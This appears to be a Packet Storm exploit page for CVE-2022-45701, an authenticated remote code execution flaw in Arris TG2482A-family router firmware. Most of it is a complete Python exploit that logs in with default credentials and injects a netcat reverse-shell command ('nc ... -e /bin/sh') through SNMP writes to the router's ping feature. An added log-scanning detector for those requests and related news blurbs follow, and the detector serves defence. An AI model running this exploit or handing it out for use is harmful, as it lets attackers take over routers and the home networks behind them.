Headline
CVE-2022-45701: Arris Router Firmware 9.1.103 Remote Code Execution ≈ Packet Storm
Arris TG2482A firmware through 9.1.103GEM9 allows Remote Code Execution (RCE) via the ping utility feature.
```python
# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Date: 17/11/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.commscope.com/
# Version: 9.1.103
# Tested on: TG2482A, TG2492, SBG10
# CVE : CVE-2022-45701

import requests
import base64

router_host = "http://192.168.0.1"
username = "admin"
password = "password"

lhost = "192.168.0.6"
lport = 80


def main():
    print("Authorizing...")
    cookie = get_cookie(gen_header(username, password))
    if cookie == '':
        print("Failed to authorize")
        exit(-1)
    print("Generating Payload...")
    payload = gen_payload(lhost, lport)
    print("Sending Payload...")
    send_payload(payload, cookie)
    print("Done, check shell..")

def gen_header(u, p):
    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")

def no_encode_params(params):
    return "&".join("%s=%s" % (k,v) for k,v in params.items())

def get_cookie(header):
    url = router_host+"/login"
    params = no_encode_params({"arg":header, "_n":1})
    resp=requests.get(url, params=params)
    return resp.content.decode('UTF-8')

def set_oid(oid, cookie):
    url = router_host+"/snmpSet"
    params = no_encode_params({"oid":oid, "_n":1})
    cookies = {"credential":cookie}
    requests.get(url, params=params, cookies=cookies)

def gen_payload(h, p):
    return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"

def send_payload(payload, cookie):
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)
    set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)

if __name__ == '__main__':
    main()
```
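A detection-side view of the requests shown above, as an added example that is not part of the original exploit or of any vendor code: it scans HTTP access-log lines for `/snmpSet` writes to the OID that carries the payload and flags any value that is not a plain hostname or IP address. The log format (Common Log Format from a proxy or sensor in front of the router), the allow-list pattern, the function names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, unquote

# OID the code on this page writes its payload to (assumed to be the ping target).
PING_TARGET_OID = "1.3.6.1.4.1.4115.1.20.1.1.7.2.0"
# Assumption: a legitimate target is a hostname or an IPv4/IPv6 literal.
SAFE_TARGET = re.compile(r"[A-Za-z0-9.:-]{1,253}")
# Assumption: Common Log Format lines from a proxy or sensor, not the router.
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def parse_snmpset(target):
    """Return (oid, value) from a /snmpSet request target, else None."""
    parts = urlsplit(target)
    if parts.path != "/snmpSet":
        return None
    for param in parts.query.split("&"):
        name, _, rest = param.partition("=")
        if name != "oid":
            continue
        # rest has the form "<oid>=<value>;<type>;" as seen on this page
        oid, _, tail = rest.partition("=")
        return oid, unquote(tail).rsplit(";", 2)[0]
    return None

def suspicious_ping_targets(log_lines):
    """Return (client, value) for target writes that are not a plain host."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        parsed = parse_snmpset(m.group(2)) if m else None
        if parsed is None:
            continue
        oid, value = parsed
        if oid == PING_TARGET_OID and not SAFE_TARGET.fullmatch(value):
            hits.append((m.group(1), value))
    return hits

# Constructed sample log lines (not captured traffic).
_TS = '- - [17/Nov/2022:10:00:01 +0000]'
_BASE = "/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.7."
SAMPLE_LOG = [
    f'192.168.0.20 {_TS} "GET /login?arg=Y29uc3RydWN0ZWQ=&_n=1 HTTP/1.1" 200 24',
    f'192.168.0.20 {_TS} "GET {_BASE}2.0=example.com;4;&_n=1 HTTP/1.1" 200 2',
    f'192.168.0.6 {_TS} "GET {_BASE}1.0=16;2;&_n=1 HTTP/1.1" 200 2',
    f'192.168.0.6 {_TS} "GET {_BASE}2.0=$(echo%20constructed);4;&_n=1 HTTP/1.1" 200 2',
]

if __name__ == "__main__":
    for client, value in suspicious_ping_targets(SAMPLE_LOG):
        print(f"ALERT client={client} ping_target={value!r}")
```

The same allow-list check is what input validation on the device side would need to enforce before the value reaches a shell.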
Related news
Arris router vulnerability could lead to complete takeover
A security researcher found an authenticated remote code execution vulnerability in very widespread Arris router models. The post "Arris router vulnerability could lead to complete takeover" appeared first on Malwarebytes Labs.
Arris Router Firmware 9.1.103 Remote Code Execution
Arris Router Firmware version 9.1.103 authenticated remote code execution exploit that has been tested against the TG2482A, TG2492, and SBG10 models.